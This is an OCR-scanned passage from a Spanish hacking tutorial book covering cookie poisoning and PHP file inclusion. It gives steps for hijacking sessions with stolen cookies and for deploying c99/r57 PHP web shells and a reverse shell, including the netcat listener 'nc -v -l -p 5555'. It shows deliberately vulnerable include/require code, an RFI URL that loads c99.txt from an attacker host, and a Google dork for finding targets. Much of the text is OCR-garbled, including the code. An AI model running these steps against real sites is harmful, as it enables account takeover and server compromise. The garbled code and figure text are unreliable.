envían puede resultar muy interesante. Tamper Data no tiene como 
único blanco a los formularios, ya que también sirve para aplicaciones 
web dinámicas que se comunican con el servidor para enviar y recibir 
cualquier tipo de dato. 
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—— Envenenamiento de cookies 


En el capítulo anterior aprendimos un poco acerca de las 

cookies, pero en esta sección analizaremos el tema más en detalle. 
El protocolo HTTP es utilizado para la transferencia de recursos web, 
pero no almacena información asociada a una sesión. De ahí surgió la 
necesidad de inventar algo que nos mantuviera identificados durante 
todo el tiempo que estuviéramos dentro del sitio web: las cookies. 

Si no fuera por las cookies, dentro de un mismo sitio, tendríamos 
que ingresar nuestro usuario y contraseña cada vez que nos movemos 
de página, ya que dicho protocolo no recuerda que somos nosotros y 
la aplicación nos pediría nuestros datos una y otra vez. 

En la actualidad, cuando ingresamos con nuestro usuario y 
contraseña se nos asigna una cookie, gracias a la cual podemos tener 
nuestras preferencias, privilegios y demás dentro de la aplicación. 


images: U informevor ¡il Mucelanecus: 7 Dutlive: Y Peer A Toca: ME Ver core A Optrens- 
ingresar 
Unasar te Shot 
Lontraeña .orssnsnnn.... 


Recordar empre 4 


[— imgresar 


Figura 16. La duración de la cookie dependerá de la casilla Recordar 
siempre. En caso de que esté desactivada, la cookie se rompe 
al cerrar el navegador; de lo contrario, siempre estamos identificados. 


Los foros, los portales de compra, las redes sociales... miles 
y miles de aplicaciones utilizan las cookies para brindar servicios 
más ajustados a las preferencias de sus usuarios. La mayoría de los 
navegadores web aceptan todas las cookies de todos los sitios por 
los que pasamos, pero podemos configurarlos para que se rechacen 
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todas o se pregunte si queremos o no aceptarlas. En Firefox, 

por ejemplo, si vamos al menú Opciones dentro de Herramientas y 
elegimos Eliminar determinadas cookies; podemos ver todas las que 
tenemos y el contenido de cada una. 


Ñ cocte: F=Fe 
Buscan 2 


Las siguientes coobies están guerndades en su computadora: 


Sto -  Mombre de Cooke 
» a google.com » 
» A php.net 
> dyahoo.com 
. y" youtube corn 
yo tube.com ue_hibos ld 
yo.tubecom VISITOR INFOL LIVE 
youtube.com PREF 
 youtube,com Gro 
» ubuntu es.org 


Nombre uyse_htbor 
Comtenido: 72c4AB5CbCoDI AS SESCIAAL] DENIA CIAL ARA A 7 
Dominio: youtube com 
Ruta / 
Enviada para: Cualguwer po de conevon 
Expira Ai finalizar la seción 


a Homingr todas las Cookies — Leer |] 


Figura 17. En Firefox podemos ver las cookies 
que lleva almacenadas nuestro navegador. 


En la Figura 17 podemos observar la composición de las “galletitas”. 
En primer lugar tenemos el nombre (en este caso es use_hitbox). Luego 
seguimos con el contenido, una combinación de números y letras. 
Después, el dominio al que pertenece la cookie (en esta ocasión es 
youtube.com). Continuamos con la ruta: si es / significa que la cookie 
es válida en todas las páginas y secciones del sitio, y de lo contrario 
se especificará un path o ruta diferente. Por último, encontramos la 
fecha de expiración: si al ingresar al sitio tildamos la casilla Recordar 
siempre nos mantendremos identificados todo el tiempo (aunque 
entremos y salgamos del navegador, apaguemos la computadora, 
etcétera), mientras que si no la tildamos la cookie se rompe al salir 
manualmente de la aplicación o cerrar la página/navegador. 

Dado que la cookie es quien nos mantiene identificados, 
permitiéndonos manejar nuestras preferencias y privilegios en 
el sitio, si obtenemos alguna que pertenezca a otro usuario se nos 
asignarán sus mismos permisos y preferencias, y podremos ingresar 
a la aplicación como si fuéramos ese usuario. En el Capítulo 4 
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aprendimos a obtener cookies ajenas, y vimos que podemos hacerlo si 
logramos que el usuario acceda al sitio vulnerable mediante una URL 
que inyecta código JavaScript programado para almacenar su cookie 
en un archivo bajo nuestro poder. 

La pregunta es... ¿qué hacemos una vez que tenemos la cookie? 

La idea es obtener su identidad, sus permisos y preferencias, 
ingresar desde nuestro navegador tranquilamente tal como si 
fuéramos ese usuario. 

No tenemos la contraseña del usuario, pero sí su cookie, y con eso 
nos alcanza para acceder a su cuenta, ya que estamos robando la 
sesión que él creó al acceder con sus datos a la aplicación. Para 
concretar el cookie poisoning o envenenamiento de cookies 
debemos reemplazar la cookie que se nos asignó por la que obtuvimos. 


usuario:adm é: pass>redifichill94 


Do 


Usuario 


Hola adm / cookie:h234gf54gf657fk7 


cookie:h234gf54gf657fk7 


PPP een io 


Hola adm! 
OO 


Hacker 


Figura 18. No necesitamos tener la contraseña del usuario 
para obtener su identidad y aprovecharnos de sus permisos. 


DN BURP SUITE 


Burp Suite es un paquete con varias herramientas interesantes, entre ellas Burp Proxy, un software que 


también sirve para llevar a cabo un envenenamiento de cookies. Podemos obtenerlo desde su sitio web 
oficial: http://portswigger.net/burp/download.html. En internet hay disponibles videos y manuales 
que explican cómo realizar un cookie poisoning utilizando esta aplicación. 
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Pero para reemplazar nuestra cookie por la del usuario necesitamos 
una herramienta que edite las cookies, ya que con Firefox solamente 
podemos verlas y borrarlas. A continuación profundizaremos el tema. 


El complemento perfecto 


Para editar nuestra cookie a fin de reemplazarla por la obtenida 
usaremos el complemento para Firefox Edit Cookies, compatible hasta 
el momento con la versión 23.0.1 del navegador. Más, 
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la ventana podremos observar sus datos (nombre, contenido, fecha de 
expiración, etcétera). Dado que queremos reemplazarla, presionaremos 
el botón Edit y se abrirá una nueva ventana, que permitirá editar cada 
uno de sus componentes. Finalmente, reemplazamos el contenido de 
nuestra cookie por la que obtuvimos. 


hara la 
$ A mes am 
OD bue de ire Y 00 (4 temer e negar Y rrrrn (e tr pa Y e Ar Ma Le 
| Mola Shey, bisnvenidh a muestro sitio web! 
Estas usando +] negado: web Firefos 11.0 
Tu vistosa operativo es Windows ? 
Y tu dirección 1P: 190,61,105.1) 


Figura 20. En la ventana de edición debemos reemplazar 
el campo Content por el contenido de la cookie obtenida. 


Otro detalle interesante a tener en cuenta es la fecha de expiración. 
No deberíamos dejar que una cookie que tanto costó conseguir expirara 
o se rompiera en poco tiempo. Allí mismo podemos modificar la fecha 
de expiración y reemplazar, por ejemplo, el año actual por el 2020. 

Por último, debemos guardar los cambios y recargar la página. 
Estaremos identificados como el usuario de quien obtuvimos su 
cookie y podremos acceder a todos los datos de su cuenta y usar 
sus permisos y preferencias. 


Modificar cookies con Tamper Data 


A continuación aprenderemos a modificar las cookies utilizando 
Tamper Data. Comenzaremos la modificación al ingresar al sitio en 
cuestión. Al enviarse la petición presionaremos el botón Modificar, de 
modo que nos aparezca la ventana con las cabeceras HTTP. En la Figura 
21 vemos que el último campo es el de la cookie: reemplazaremos su 
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valor y aceptaremos, para enviar los datos al servidor. Acto seguido, 
se cargará la página con nuestra nueva identidad. 


rm. 13 
$ 4 me a 
O mesr de Conor Y 5 Li tor repr Y nn ll Matar Y Dat Y tar A len MN e ico A pronr 


Hola Shey, bienvenidg a nuestro sitio web! 
Estas usando el navegador web Firefox 11.0 
á Tu sistema onerativo es Windows 7 
WO tooo 000 tapas ¡en y 191 190.68.105.33 
e Pm Oupcaoas gado | 


Pt rr pb vato de o pa ad e pr y 


Haedo de cotesina pu Vales decos | | er de toca a a 


Figura 21. Con Tamper Data también podemos 
realizar un envenenamiento de cookies. 


En definitiva, solo necesitamos alguna herramienta que nos ayude a 
editar nuestras cookies. Edit Cookies es un complemento ideal y posee 
una interfaz gráfica muy fácil de usar. Por otro lado, Tamper Data es 
excelente, ya que permite hacer muchísimas cosas, incluso modificar 
las cookies que se envían al servidor. Otras aplicaciones que sirven 
son las del estilo de Burp Proxy. En internet hay muchas herramientas 
disponibles para ayudarnos en la técnica de envenenamiento de cookies. 


"VAS 


m RESUMEN 


Del lado del cliente pueden efectuarse técnicas de ataque muy interesantes. En este capítulo aprendimos 
algunas de ellas, como la manipulación de formularios, y manejamos herramientas que facilitan la modi- 
ficación de campos de texto y permiten ver campos ocultos y eliminar límites para realizar inyecciones. 
Por otro lado, aprendimos a situarnos en el medio de nuestra propia conexión con el servidor para, desde 
allí, saltar filtros programados en tecnologías del lado del cliente y así poder vulnerar la aplicación web. 
Por último realizamos la técnica de cookie poisoning y entendimos por qué es de interés para un hacker 
obtener cookies de otros usuarios. 
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Actividades 


TEST DE AUTOEVALUACIÓN 


¿Con qué inconvenientes puede encontrarse un hacker frente a un formulario? 
¿Qué herramientas ofrece el complemento Web Developer? 

¿Para qué sirve convertir los métodos de envío de datos de un formulario? 
¿Cómo podemos ver y modificar un campo oculto? ¿Por qué es útil esto? 


¿Por qué puede ser útil eliminar el límite de caracteres de un campo de texto? 


G<fu0oB q00mNnNn 


¿Qué podemos lograr metiéndonos en medio de la comunicación entre nuestro 
navegador y el servidor web? 


7 ¿Qué herramientas nos ayudan a interceptar y modificar los datos que envía 
una aplicación? 


8 ¿Por qué es de interés para un hacker robar una cookie? 


EJERCICIOS PRÁCTICOS 


Investigue las herramientas del complemento Web Developer. 
Convierta el método de envío de GET a POST y de POST a GET en un formulario. 


Elimine el límite de caracteres de un campo que utilice la propiedad maxlength. 


Pb 0 NN rr 


Intercepte comunicaciones entre usted y el servidor web mediante el comple- 
mento Tamper Data. 


5 Realice un envenenamiento de cookies utilizando el complemento Edit Cookies. 


hs PROFESOR EN LÍNEA 


Si tiene alguna consulta técnica relacionada con el contenido, puede contactarse 
con nuestros expertos: profesorOredusers.com 
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Inclusión de archivos 


Hasta ahora solo hemos visto ataques que se llevan a cabo 
del lado del cliente. Llegó el momento de obtener control total 
de un servidor web. Buscaremos, en la programación de 

las páginas, fallas de seguridad para incluir archivos locales 

y remotos. Analizaremos los peligros de un error de este tipo 
y cómo apoderarnos del servidor mediante la inclusión de 


diversos archivos internos y externos. 


w Introducción a la inclusión w Local File Inclusion ............... 185 SS 


ARCHIVOS snmoszacnos senzazona nocasanar 168 
v Solución al problema ............. 192 
v Shells: control 
en un solo archivO.........o...mo.. 171 A 195 
v Remote File Inclusion............ 180 w ActividadesS......coconnoccnnncnnnnonnane 196 


AMA 
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Introducción a la 
inclusión de archivos 


Cuando utilizamos el término inclusión de archivos nos estamos 
refiriendo a la inclusión de un documento dentro de otro, por ejemplo, 
una página web dentro de otra. 

¿Cuál es la utilidad? Supongamos que tenemos que programar 
un sitio que en cada página tenga una misma publicidad. Por lógica 
tendremos que repetir el mismo código en cada lugar donde se desee 
mostrar el anuncio, lo cual puede ser tedioso y nos ocupará unas 
cuantas líneas. Pero tenemos otra opción: programar todo el código 
necesario para mostrar la publicidad en un solo archivo, y luego 
incluirlo en todas las páginas necesarias. De tal modo, la cantidad 
de líneas que tendremos que programar se reducirá a una sola, que 
se encargará de incluir el archivo en el lugar indicado. 


publicidad a ma 


pagina.php publicidad.php 


Figura 1. El método de inclusión de archivos consiste 
en incluir un documento (publicidad. php) dentro de otro 
(pagina. php), para que se muestren como uno solo. 


Dado que los archivos que se incluyen están alojados en el servidor, 
necesitamos hacer uso de un lenguaje de programación que se ejecute 
de ese lado, como por ejemplo PHP, que ofrece funciones útiles para la 
inclusión de archivos. 

En este capítulo analizaremos una vulnerabilidad que compromete 
de lleno la seguridad del servidor, a diferencia del XSS que solo afecta 
al usuario. En la técnica de Cross-Site Scripting usamos JavaScript, un 
lenguaje que se interpreta en el navegador web, y por ende el ataque 
solo afecta al cliente; mientras que las inclusiones de archivos se 
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manejan completamente del lado del servidor, haciendo uso de PHP 
u otro lenguaje server-side. La vulnerabilidad que trataremos se basa 
en fallos de seguridad en el uso de funciones que permiten realizar 
una inclusión de archivos. 


Inclusión de archivos locales 


Los archivos locales son los que se hospedan en un mismo 
servidor web. Siguiendo el ejemplo anterior de la 
publicidad, los documentos pagina.php y publicidad. 


php se encuentran en la misma ubicación, por lo LAS INCLUSIONES 

tanto, se realiza una inclusión local. DE ARCHIVOS SE 
En algunos sitios, sucede que al navegar 

a través del menú la dirección URL se va MANEJAN CON 

modificando. Por ejemplo, puede que al entrar al TECNOLOGÍAS 


ítem Empresa veamos algo similar a www.sitio. 


com/index.php?pag=empresa.php. En cambio, SERVER-SIDE 


si nos movemos a Contacto, la URL será www. 
sitio.com/index.php?pag=contacto.php. 

En estos casos, es probable que se esté usando la función include de 
PHP, que permite realizar inclusiones de archivos. La página principal 
incluye en su contenido el archivo que deseamos ver, PHP interpreta 
todo como una sola página y se la envía al usuario. 


index.php 
include(empresa.php); 


<S empresa.php 


Cliente 


Servidor web 


Figura 2. Se incluye dentro de index. php el contenido de empresa. php. 


PHP las interpreta como una sola página y las muestra al usuario. 
En resumen, hablamos de una inclusión local cuando el contenido 


de un archivo se incluye dentro de otro y ambos están alojados en el 
mismo servidor web. 
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Ahora bien, ¿qué ocurriría si, por fallos de seguridad en la 
programación del código, podemos modificar el archivo que se 
incluye?¿Y qué pasaría si no hay ningún filtro que verifique si se está 
incluyendo el documento correcto? En esa situación, podríamos incluir 
y ver el contenido de cualquier otro archivo alojado en el servidor, 
mediante la técnica denominada Local File Inclusion (LFI). 


Inclusión de archivos remotos 


Hemos visto cómo pueden incluirse archivos locales dentro de un 
sitio web, pero también podría darse el caso de que el programador 
necesite incluir en alguna de sus páginas el código de un archivo 
alojado en otro servidor. 

Supongamos que el documento de la publicidad está en una 
ubicación diferente a la de la página donde debe mostrarse; en ese 
caso, la sintaxis de la función include de PHP sería similar a la siguiente: 
include(*http://sitio.com/publicidad.php”);. 


publicidad.php 
Servidor web 2 


pagina.php 
include(”http://web.com/publicidad.php”); 
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en la aplicación que permita al atacante modificar el archivo que se va 
a incluir, con la diferencia de que, si se trata de una inclusión local, se 
puede ver el contenido de cualquier archivo del servidor. En el caso 

de la inclusión remota se puede subir al servidor otro archivo, por 
ejemplo, uno que otorgue al hacker control total sobre el servidor web. 


Shells: control en 
un solo archivo 


Quizás nunca hayamos escuchado la palabra shell en el ámbito de la 
informática. Sin embargo, cualquier persona que utiliza una computadora 
está haciendo uso de ellas, ya que son programas que ayudan al usuario 
a acceder y controlar los servicios que ofrece el sistema operativo. Por 
ejemplo, el Explorer de Windows es una shell gráfica usada al llevar a cabo 
cualquier tarea. También existen las de texto, como la terminal o consola 
de comandos (CMD) que poseen todos los sistemas de Microsoft. 

En resumen, las shells son programas que posibilitan la interacción 
con el sistema operativo, y el objetivo de un ataque si lo que se busca 
es el control total del sistema. 


EN Administrador Símbolo del sstema au aj ¡| ES 


oft MHindows Í 6.1.7608 1 
ght te 24499 t Corporation. Hezservados todos 


Figura 4. En Windows 7, ingresando al menú Inicio/Todos 
los programas/Accesorios encontramos el ítem 
Símbolo de sistema, que abre la shell de Windows. 
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Es lógico pensar, entonces, que el objetivo de un hacker 
malintencionado sea obtener de manera remota una shell sobre 
el sistema que esté atacando. ¿Pero por qué de manera remota? El 
atacante, la mayoría de las veces, no tiene acceso físico al sistema al 
que quiere ingresar, por lo cual debe lograr el control total a través de 
una shell, ejecutando comandos en ella desde su computadora. 

En el caso de los servidores web, el objetivo es subir una 
PHP shell. A diferencia de otras, éstas están programadas en PHP 
y contienen funciones especialmente hechas para facilitar el manejo 
del servidor web, por lo cual suelen ser detectadas por los antivirus. 
Sin embargo, existen modos de hacerlas pasar desapercibidas, en el 
sitio http://r57.gen.tr podemos conseguir varias de ellas. 

A continuación, conoceremos las PHP shell más destacadas que 
existen y aprenderemos a usarlas. 


shell.php 


Hacker Servidor web 


Figura 5. El objetivo es lograr subir una PHP shell 
al servidor, y así obtener su control total. 


Las shells más populares 


Una shell no es un virus. Si bien son detectadas por los antivirus, 
por sí mismas no causan daño al servidor, sino cuando quedan 


O FUNCIONES PHP 


Existen cuatro funciones en este lenguaje que permiten trabajar con inclusión de archivos. Hasta aquí 
hemos visto include, pero también están include_once, require y require_once. Todas sirven para incluir 


archivos. Las diferencias entre ellas son mínimas y están documentadas en www.php.net. 
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en manos de un atacante. Hay muchas shells 


diferentes y todas cumplen el mismo objetivo, AL EJECUTAR 
pero algunas poseen más funciones útiles. COMANDOS EN UNA 
Las más populares son Cc99 y r57. 
PHP SHELL PODEMOS 

c99 CONTROLAR UN 

Es una shell antigua, aunque ha tenido SERVIDOR WEB 
muchas versiones, modificaciones y mejoras a 
lo largo a los años. Si bien no existe un sitio web =; > 
determinado donde podamos descargarla, está subida a 


muchísimas páginas (como la mencionada http://r57.gen.tr). 
Una vez obtenida debemos alojarla en un servidor web bajo 
nuestro poder y acceder a ella desde el navegador (como haríamos 
con cualquier otro archivo PHP). 
En primer lugar veremos información acerca del servidor 
(por ejemplo el software que se está utilizando, los permisos, si se 
encuentra activado el Safe Mode y el espacio disponible en el disco). 
Luego encontraremos un menú con herramientas, que analizaremos 
a continuación, y el listado de directorios y archivos del servidor. Las 
acciones que podemos ejecutar sobre las carpetas y documentos del 
sitio son borrar, cortar y copiar, y hacia el final se encuentra la opción 
de buscar archivos y crear nuevos directorios. 


[C99Shell v. 1.0 beta (21,05,2005)! 
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Figura 6. El listado de directorios y archivos del servidor 
es lo primero que encontramos al acceder a la shell c99. 
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Sobre el menú, la primera herramienta es el Encoder, que codifica 
y/o calcula el hash de lo que escribamos, en el área de texto de la parte 
superior. Por ejemplo, si queremos codificar la frase “hola, todo bien?”, 
luego de escribirla debemos presionar el botón Encoder para calcular, 

y automáticamente veremos en los campos de texto inferiores el 
equivalente en MD5, base64, shal, urlencode y hexadecimal, 
entre otras codificaciones y hashes. 


1C99Shell v, 1,0 beta (21.05.2005)! 


Figura 7. La herramienta Encoder sirve 
para codificar el texto que queramos. 


Adicionalmente, en el menú también disponemos de la opción 
SAL, útil para manipular las bases de datos que posea el servidor. En 
primer lugar veremos campos con los datos para conectarnos y luego 
encontraremos varias opciones: crear una base de datos nueva, elegir 
una de las existentes y acceder a sus tablas y columnas, borrar o 
modificar una base de datos, entre otras. 


NUESTRA PROPIA PHP SHELL 


Programar una PHP shell es una tarea bastante difícil. Pero, si nos gusta el lenguaje, es un proyecto que 


nos hará crecer mucho en conocimientos sobre PHP. No es necesario tenerla completamente terminada 
para poder usarla, ya que podemos comenzar con funciones útiles y sencillas, como el listado de archi 


vos del servidor, y luego ir avanzando. 
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!IC9OShell v. 1.0 beta (21.05.2005)! 


Figura 8. La shell c99 posee una herramienta para el manejo 
de las bases de datos que permite ver, crear, 
borrar y modificar bases de datos, tablas y columnas. 


Por último podemos nombrar a la herramienta PHP-Code, 
que permite ejecutar en el servidor cualquier código PHP, mediante 
un área de texto. 

En conclusión, la shell c99 pone a nuestra disposición excelentes 
herramientas para obtener el control total de un servidor web. 
Conozcamos ahora otra shell interesante. 


LOS ANTIVIRUS 


r37 BLOQUEAN LAS PHP 
La PHP shell r57 posee menos funciones que 
la c99, pero aun así es de gran ayuda para quien SHELL C99 Y R57 


busca apoderarse de un servidor web. En primer PORQUE SON USADAS 
lugar, muestra datos del servidor (prácticamente 


los mismos de la shell anterior). POR ATACANTES 
Si queremos navegar a través de los 

directorios del servidor, debemos utilizar el As A 

ejecutor de comandos que aparece debajo del listado de 


archivos. También existe la posibilidad de buscar y editar archivos 
ya existentes en el sitio, y hay una consola PHP para ejecutar 
cualquier script en este lenguaje. 


www.detodoprogramacion.com www.redusers.com <« 


176 6. INCLUSIÓN DE ARCHIVOS 


Pira 


04 (Peiacs Y bread Aa Sora Doro 14 0000. 


Figura 9. A pesar de tener menos funciones que la shell c99, 
la r57 es muy usada por atacantes para apoderarse de servidores web. 


Existen, también, las opciones destinadas a subir y bajar 
archivos del servidor y desde un FTP remoto. Otra funcionalidad 
interesante es la de poder enviar mails anónimos o con remitentes 
falsos, algo muy utilizado por los poco queridos spammers 
(personas que se dedican a enviar correo electrónico no deseado). 

Por último, la herramienta para bases de datos permite 
conectarse y ejecutar cualquier comando con la sintaxis SQL. 


Figura 10. La interfaz gráfica de la shell r57 
es menos intuitiva que la que posee la c99. 
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En las próximas secciones de este capítulo aprenderemos varias maneras 
de incluir una shell en un servidor, mediante las técnicas de Remote File 
Inclusion y Local File Inclusion. Antes de comenzar, queda un asunto 
pendiente: cómo realizar una reverse shell o shell inversa. 


Shell a mí 


Como dijimos antes, los antivirus y firewalls detectan las shells 
c99 y r57 debido a que pueden ser utilizadas por atacantes para 
tomar el control de un servidor web. En esta sección aprenderemos a 
obtener una shell inversa. Dado que un firewall suele aplicar mayor 
restricción al tráfico entrante que al saliente, si logramos que sea 
el servidor quien se conecte a nosotros brindándonos una shell, 
probablemente saltaremos los firewalls que posea. 


¡pa 


—- | 


Hacker Firewall Servidor web 


¡pa 


Hacker Firewall Servidor web 


Figura 11. Obtener una shell inversa consiste 
en lograr que el servidor web se conecte a nosotros, 
de me $ 
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Debemos ingresar a la Web de PentestMonkey (www.pentestmonkey. 
net), dirigirnos al menú Tools y entrar en la categoría Web Shells. Allí 
veremos el tema Reverse Shell, donde podremos hallar su código fuente 
y un ejemplo de uso en idioma inglés (tengamos en cuenta que esta shell 
inversa solo funciona en sistemas Linux). Una vez obtenida, debemos 
abrirla con cualquier editor de texto y encontraremos, en los comienzos del 
código, dos líneas que debemos modificar: 


$ip ='127.0.0.1% // CHANGE THIS 
$port =1234; — //CHANGE THIS 


Reemplazaremos el valor de la variable ip por la dirección IP de nuestra 
computadora (que podemos averiguar, por ejemplo, en www.cualesmiip. 
com). Luego elegiremos un número de puerto para realizar la conexión 
(por ejemplo, 5555) y se lo pasaremos como valor a la variable port. 


A 


reverseshell ta (/var/wwnw) - gedit 


myeneshel tal M 


y) daemonise 


Plalís Test + Tab Width 8 190 Cold 


Figura 12. Debemos especificarle a la shell la dirección IP 
y el puerto al que se va a conectar el servidor web. 


Realizados los cambios, guardamos el archivo con extensión .php 
y lo subimos al servidor web objetivo (mediante la herramienta para 
subir archivos que posee la c99 o -en caso de no tener ninguna PHP 
shell hospedada en el servidor- explotando alguna vulnerabilidad 
que nos permita lograrlo). 
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Antes de ejecutar la shell inversa en el servidor 
debemos poner a la escucha de conexiones el 
puerto 5555 (o el que hayamos elegido) en nuestra 
computadora, haciendo uso de la herramienta de red 
NetCat (NC), vista en el Capítulo 3. 

En la Figura 13 podemos observar los sencillos 
parámetros que debemos pasarle a NC para lograr 
recibir la shell en el servidor. En primer lugar, 
vemos la -v (modo verbose) para más 
información de la conexión, luego -| (listen) para 
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UNA SHELL INVERSA 
LOGRA QUE 

EL SERVIDOR SEA 
EL QUE SE CONECTA 
A NOSOTROS 


poner a la escucha el NetCat, y por último —p, para especificar el puerto > 
(en este caso 5555). El comando completo es: nc -v -| -p 5555. Ahora sí, 

accedemos desde la barra de direcciones o ejecutamos desde la c99/ 

r57 nuestro archivo PHP de la shell inversa para recibir la conexión. 


Figura 13. Obtuvimos una shell de comandos en el servidor, 


controlada desde nuestra computadora. 


Hemos visto el poder de una shell, pero de nada sirve si no logramos 
subir una PHP shell o shell inversa al servidor web. En el comienzo 
de este capítulo nos introdujimos en la inclusión de archivos locales 


y remotos, y conocimos la posibilidad de que haya fallos en el uso de 


las funciones PHP que permiten realizar inclusiones. Desde allí parten 


las técnicas Local File Inclusion (LFI) y Remote File Inclusion (RFID), que 


analizaremos en profundidad a continuación. 
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—— Remote File Inclusion 


Como hemos visto, puede suceder que un programador web necesite 
incluir en alguna de sus páginas el código de un archivo alojado en otro 
servidor web. Sabemos que se puede lograr mediante la función include de 

PHP, pero hacer uso de ella tiene sus riesgos, ya que 
sin darse cuenta el desarrollador podría programar 


RFI SE APROVECHA el código que contiene esta función de manera que 
DE FALLAS EN otros usuarios puedan modificar el archivo que se 
E va a incluir. Así, el atacante tendrá la oportunidad 
LA INCLUSION de subir cualquier archivo al servidor atacado (por 
REMOTA DE ejemplo una PHP shell) y apoderarse de éste. 
La técnica de Remote File Inclusion aprovecha 
ARCHIVOS este tipo de fallos en funciones como include. 


Si bien las inclusiones pueden ser locales o 
remotas, comenzaremos estudiando estas 
últimas. Aprenderemos a subir una PHP shell al servidor web 


explotando la vulnerabilidad de RF!I. 


Peligro a la vista 

Debido a que PHP se ejecuta del lado del servidor, no podemos ver 
desde nuestro navegador el código escrito en este lenguaje que posea 
la página en cuestión, por lo cual será un poco más difícil detectar si la 
aplicación es vulnerable a RFl o no. Conocer las fallas de programación 
que aprovechan los atacantes para explotar esta técnica nos ayudará a 
identificar las aplicaciones inseguras. 

Para realizar prácticas, crearemos un archivo llamado rfi.php, con el 
siguiente código: 


O SHELL INVERSA CON NETCAT 


En lugar de usar una PHP reverse shell, podemos aprovechar la herramienta para subir archivos 
que posea la c99/r57 y subir al servidor el NetCat. Después de darle permisos de ejecución, le 
pasamos los parámetros necesarios para que se conecte a nuestra computadora, especificando la 


dirección IP y puerto a utilizar. 
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<?php 

if (isset($_GETE'doc'1)) £ 
$documento = $ _GETE'doc']; 
include ($documento); 

) 

2> 


a * 


€ cotas 


ESTO ES UN DOCUMENTO HTML EXTERNO 


Figura 14. Programamos un código que nos permite incluir 
un archivo remoto especificándolo a través de la URL. 


Recordemos que GET indica que se le asignará el valor a la 
variable a través de la URL. Supongamos que un sitio web posee, 
en alguna parte de su código, las líneas escritas anteriormente: el 
valor de la variable podría asignarse según la acción que ejecute 
el usuario sobre la aplicación, por lo tanto no está especificado con 
anterioridad el archivo a incluir, de modo que el atacante tenga la 
posibilidad de colocar el documento que quiera dentro del servidor. 
Pero si no puede ver el código PHP de la aplicación ¿cómo sabe si la 
página es vulnerable a RFI? 

Si se está usando el método GET es mucho más fácil, ya que se puede 
visualizar en la URL algo similar a lo siguiente: www, sitio.com/index. 
php?doc=http://otrositio.com/doc.php. Esta dirección es muy 
sospechosa, ya que evidentemente se está incluyendo un documento 
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externo al servidor web. Lo siguiente es testear la aplicación pasándole 
a la variable doc cualquier valor que no esté registrado en el sitio, 
con el objetivo de ocasionar un error (por ejemplo, www.sitio.com/ 
index.php?doc=cualquiercosa). De este modo, puede que veamos 
un mensaje similar al siguiente: Warning: include(cualquiercosa) [function. 
include]: failed to open (...). 

Si lo analizamos detenidamente, notaremos que se produce 
un error en la función include, ya que no encontró el archivo que 
tenía que incluir pero sí lo aceptó como parámetro válido. Con esto 
acabamos de confirmar que la aplicación es vulnerable a un ataque 
de inclusión de archivos. 


11 DIA dd Loa 0) LE 


¡A Tiene Near Funcion Location 
| 1 60004 365580! (maz J( ) pá O 


Figura 15. Producimos un error en la aplicación con el objetivo 
de confirmar si es vulnerable o no a un ataque de inclusión de archivos. 


Finalmente, intentamos incluir un documento externo al sitio 
vulnerable: www.sitio.com/index.php?doc=http://sitioataque. 
com/archivo.php. Si podemos visualizarlo correctamente, hemos 
logrado llevar a cabo un RFI, ya que incluimos en el servidor un archivo 
diferente al que en realidad debía ser incluido. 

Ahora bien, ¿qué sucede si se utiliza el método POST en lugar de 
GET? Que no sea visible la inclusión de archivos en la URL no significa 
que no se realice. Debemos utilizar algún complemento para Firefox 
(como Tamper Data o Live HTTP Headers) para capturar y modificar el 
contenido POST que se envía al servidor. 
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Hemos aprendido a detectar un RFI conociendo el funcionamiento 
de un código vulnerable a este ataque, a partir de la modificación 
de los parámetros de la función PHP, logrando así incluir un archivo 
diferente al que debía ser incluido. Incluyendo una PHP shell, podemos 
apoderarnos fácilmente del servidor. 


Inclusión de una shell mediante RFI 


Si el principal objetivo es obtener el control total del servidor web, 
tenemos la posibilidad de explotar una vulnerabilidad de tipo RFI y 
subir una PHP shell. Como la inclusión es remota, debemos hospedar 
la shell en algún servidor bajo nuestro poder. 


Figura 16. Cambiamos la extensión de la PHP shell 
con la intención de que no se ejecute 
como tal en el servidor bajo nuestro poder. 


D GOOGLE DORKS 


Muchas veces, pequeños atacantes de pocos conocimientos buscan en Google páginas al azar que posi- 


blemente sean vulnerables a RFI/LFI. Lo hacen mediante el uso de dorks, una combinación de comodines 
de búsqueda y, por ejemplo, direcciones URL de posibles aplicaciones vulnerables. Una combinación 
simple podría ser: allinurl:index.php?page=. 
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Existe una cuestión a considerar: la extensión del archivo 
que vamos a incluir. Por ejemplo, la c99 es un script PHP: si la 
subimos a nuestro servidor con la extensión correspondiente se va a 
ejecutar ahí mismo y, cuando realicemos la inclusión en la aplicación 
vulnerable, solo visualizaremos el código HTML de la shell. Para que 
esto no ocurra debemos subirla con una extensión diferente, como 
c99.txt, c99.jpg, etcétera. 

Sería lógico pensar que, si cambiamos la extensión de la shell para 
que simule ser un archivo de texto, al incluirla en la aplicación web 
vulnerable también la veremos de ese modo. 

Pero esto no ocurre, ya que la función include interpreta como PHP 
el documento que se le pase de parámetro y, por lo tanto, la shell se 
ejecuta correctamente en el servidor web que queramos controlar. 

Para erradicar las dudas utilizaremos el archivo rfi.php, que hemos 
programado anteriormente. El documento a incluir se asigna a la 
variable doc a través de la barra de direcciones, ya que se utiliza el 
método GET. Si incluimos en el servidor web que posee la aplicación 
vulnerable una PHP shell hospedada en un sitio bajo nuestro poder, 
la dirección URL será similar a: http://sitio.com/rfi. 
php?doc=http://sitioataque.com/c99.txt. Podemos ver el 
resultado en la Figura 17. 


:¿C99Shell v. 1.0 beta (21.05.2005)! 


Figura 17. Obtuvimos el control total 
del servidor web al subir una PHP shell, 
explotando una vulnerabilidad de tipo RF, 
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Lograr nuestro objetivo fue fácil. Sin embargo, la técnica RFI 
es poco explotada debido a que la inclusión remota de archivos 
viene deshabilitada por defecto en el php.ini. En los siguientes 
párrafos analizaremos en detalle la inclusión de archivos locales, 
una práctica más frecuente. 


Local File Inclusion 


Al igual que en el RFI, en las inclusiones de archivos locales la falla 
se produce si se le permite al atacante modificar el archivo que se va 
a incluir. La diferencia radica en que, en este caso, no es posible subir 
ningún archivo externo al servidor, volviendo más complicado su 
dominio mediante una PHP shell. 

A continuación programaremos el archivo Ifi.php, que contendrá un 
código vulnerable a esta técnica: 


<?php 

if (isset($ GETE'pag' DM 
$pagina = $ GETl'pag”); 
require($pagina); 

) 


2> 


En lugar de include usamos require, otra función 


PHP que permite realizar inclusiones de archivos. CON LOCAL FILE 
Podemos comprobar que los códigos vulnerables INCLUSION NO SE 
a RFI y LFI son prácticamente iguales, ya que el 
hecho de que la aplicación permita o no inclusiones PUEDEN SUBIR 
remotas se debe, más que nada, a las directivas ARCHIVOS EXTERNOS 
habilitadas en los archivos de configuración. 
